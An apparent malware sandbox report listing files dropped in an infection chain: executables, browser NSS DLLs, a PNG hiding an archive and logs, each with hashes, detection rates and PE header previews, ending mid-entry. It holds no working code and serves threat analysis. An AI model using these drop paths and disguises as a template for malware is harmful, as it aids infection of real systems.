                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\nss3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\96e283ac77.exe.log

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe
                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DJj.exe.log

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3094
                                                                                                                                                                                                                            Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                            MD5:2A56468A7C0F324A42EA599BF0511FAF
                                                                                                                                                                                                                            SHA1:404B343A86EDEDF5B908D7359EB8AA957D1D4333
                                                                                                                                                                                                                            SHA-256:6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
                                                                                                                                                                                                                            SHA-512:19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1879552
                                                                                                                                                                                                                            Entropy (8bit):7.94731574906625
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:B9in5MWHWY4kvUH+EcwOT3Cm4dtgLQ6oHvr:B9ouYxvXEcwOjCBgLE
                                                                                                                                                                                                                            MD5:8A0FEB447F024F32D1EE001A56D7EE23
                                                                                                                                                                                                                            SHA1:39086A8133462FBBDBAAD4A313789D216497E68A
                                                                                                                                                                                                                            SHA-256:B474D829617220D8D949FA58A39D9EAFDE02EC488F0C7A4330950FEFED66BD86
                                                                                                                                                                                                                            SHA-512:09EFC757B29341D91D08619E8924B5CBB3ACD73F2FE13B1AA21327C4133721102110B17F6717B09E703D1137D4266AB6E563F85BD34E98A1EE03B1B50E7DDBEC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0J...........@..........................`J.....wY....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...aseoxclk.0..../..*...^..............@...dunhoeap..... J.....................@....taggant.0...0J.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5214208
                                                                                                                                                                                                                            Entropy (8bit):5.553926621306434
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:tdbMDNGUtKUNT86JVmXjm7Cm9WAiWoIKOhAG7v8e9fjVJWdXngnX4IBAN35fKlcn:XbMZZDNT9VSS/ziwvko3m/Vdc1+2uax
                                                                                                                                                                                                                            MD5:7684D60F9F9760FB4AC16A2FA7F5EEDA
                                                                                                                                                                                                                            SHA1:FEC71D46AAAA8A2E1BE929F5F9522CF20476E4DF
                                                                                                                                                                                                                            SHA-256:BE5C102D5890C37EBA46005A4BA4D467EFD2A96CACE2E225B5F98F87295D67C0
                                                                                                                                                                                                                            SHA-512:DE81C0537A5D821522542C38B94A1E71D9FC6673EB011D26ABCEBA68C7FB5383D0A6F14124D7D358E8B939583DD482FFD2CDE033B0ABD205567C59FC7E038960
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................O.....e.O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...esuubaeu..*...$...*...$.............@...sfvezqry......O......jO.............@....taggant.0....O.."...nO.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4478464
                                                                                                                                                                                                                            Entropy (8bit):7.981218944308098
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:/jTXkiWmP7OkrMWwDgmuvTeYh9qE1CK1E8fpSFoiQ94Bya8nE:/jTtPEN4R9LYh8fsc0yhE
                                                                                                                                                                                                                            MD5:B6BF5FB735BF9B5B70A90D2C7EEB2996
                                                                                                                                                                                                                            SHA1:E558C73BD203DC9DB3F548B9631715D281D5FC2E
                                                                                                                                                                                                                            SHA-256:CBA47D50BDD548BB66BCB87510FDCC8893E53D4077FA626A0C29D83536439B6F
                                                                                                                                                                                                                            SHA-512:6640917F97A6B668D92DC8C01EBCC3EAC7515D9E4FB8E8D5DC994ECA7534A9B90E65264FCCA869A32055C1BD4E8AA404B7B4D9519850B48EB11C4D2D577D5768
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................x.D...@... ............................._.r.s.....r.....................................................p....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..8...r......H(.............@...xyfieepk.............J(.............@...lpcplxjb.............0D.............@....taggant.0......."...4D.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):156917
                                                                                                                                                                                                                            Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                            MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                            SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                            SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                            SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png, Author: ditekSHen
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2931200
                                                                                                                                                                                                                            Entropy (8bit):6.50607725991172
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:yLAf12U1ev5LTQPYAspIEU3skhieZqYyEmNVqSG:yk0U1wxUPYzSjhimEHqSG
                                                                                                                                                                                                                            MD5:1C22D90D4F3C0BE6834E0777C7B4D18A
                                                                                                                                                                                                                            SHA1:C1700CDA1DBD134CBC353F6A5C75863A36FF8FEF
                                                                                                                                                                                                                            SHA-256:C4A413D00C7EDA2AEDBAFE67AFEB0F887531B01335FD59CE51D9901F829AEDFE
                                                                                                                                                                                                                            SHA-512:E802C6DFE35239EDBD867AA4C2B0D9FEB13A1FF017E079D2A14810ABAF963879B601F9DE1919E2586C8138ED34D46EE615C3CEB5BEFC5BBA913B4BE441470320
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.....C.-...@.................................Y@..m............................A...................................................................................... . . .......d..................@....rsrc .....0.......t..............@....idata .....@.......t..............@...ibdqnddj. *..P....*..v..............@...izikvcoa.....p/.......,.............@....taggant.0..../.."....,.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2668544
                                                                                                                                                                                                                            Entropy (8bit):6.1024828899386625
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:CAT1rDm9Jeg99E2spwr44UaaDB8v+oyLfwt3LE3eFqZHNZ25WYDo6fsWc6jlOaSo:CATNI9G2sOr44UaaDB8moVt3LE3eFqZw
                                                                                                                                                                                                                            MD5:87330F1877C33A5A6203C49075223B16
                                                                                                                                                                                                                            SHA1:55B64EE8B2D1302581AB1978E9588191E4E62F81
                                                                                                                                                                                                                            SHA-256:98F2344ED45FF0464769E5B006BF0E831DC3834F0534A23339BB703E50DB17E0
                                                                                                                                                                                                                            SHA-512:7C747D3EDB04E4E71DCE7EFA33F5944A191896574FEE5227316739A83D423936A523DF12F925EE9B460CCE23B49271F549C1EE5D77B50A7D7C6E3F31BA120C8F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!.*, ..)!.*- r.)!p-* s.)!p-- q.)!p-, G.)!.*( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg...............*..&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1929216
                                                                                                                                                                                                                            Entropy (8bit):7.947619299667144
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:QdS535ssLP/LZ5uDPBapp54SAy3u/RqnWBvU4rwH:QGLHHuDgppu8nGU4r
                                                                                                                                                                                                                            MD5:CA7C431ABAC02CFB1B6B43ED9B3457E3
                                                                                                                                                                                                                            SHA1:CC6A65963485EC5FE2B266ED6EAE613295C8B736
                                                                                                                                                                                                                            SHA-256:5A8DB8011EEC67E7677DB586D4FF45CB35F3E2E83DCB6AE5BF8B446666D9AFF4
                                                                                                                                                                                                                            SHA-512:FECB7ACACC74C70FA4999FE622DAD09703CA1E636F55D10A33E0A59E8C86C0708F315717C902948CA8F2E2BDB963F043F522AFF1ECAF63C3F9B53183DBCE0B99
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................K...........@...........................K.....GH....@.................................Y@..m....0.......................A...................................................................................... . . .......d..................@....rsrc........0.......t..............@....idata .....@.......v..............@... ..+..P.......x..............@...qppoenam......0......z..............@...qzwmqxvv......K......J..............@....taggant.0....K.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1942528
                                                                                                                                                                                                                            Entropy (8bit):7.942063905165316
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:EqbNCc10ZS0IxiWC5mmp1S2QTKsedgEw:EINCTWH4O2Q+VdgE
                                                                                                                                                                                                                            MD5:07556363D556F4B6DE664EEC5107B5BC
                                                                                                                                                                                                                            SHA1:C4A059B2D8C2F972529C6FA62B9D0795ADA3198A
                                                                                                                                                                                                                            SHA-256:DB5636FAF06E7C4AAFD987648DAF5250D978A629042E8C6C5193C90E8BB88383
                                                                                                                                                                                                                            SHA-512:B2A822CDC11987E355ADBC00BE79399E29D9584519FAC742E32E39F98A3D3489F87F8E10CBE7F4DAC06A2EED80F0FD13DC25A25AF9ECAF1A2D56EB9A573A2787
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....... ............@..........................P.......0......................................[.A.o.....@............................................................................................................. . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..)...A.....................@...uiswpquv.....`k.....................@...ziulmwng.............|..............@....taggant.0... ..."..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                                                                            Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                            MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                            SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                            SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                            SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
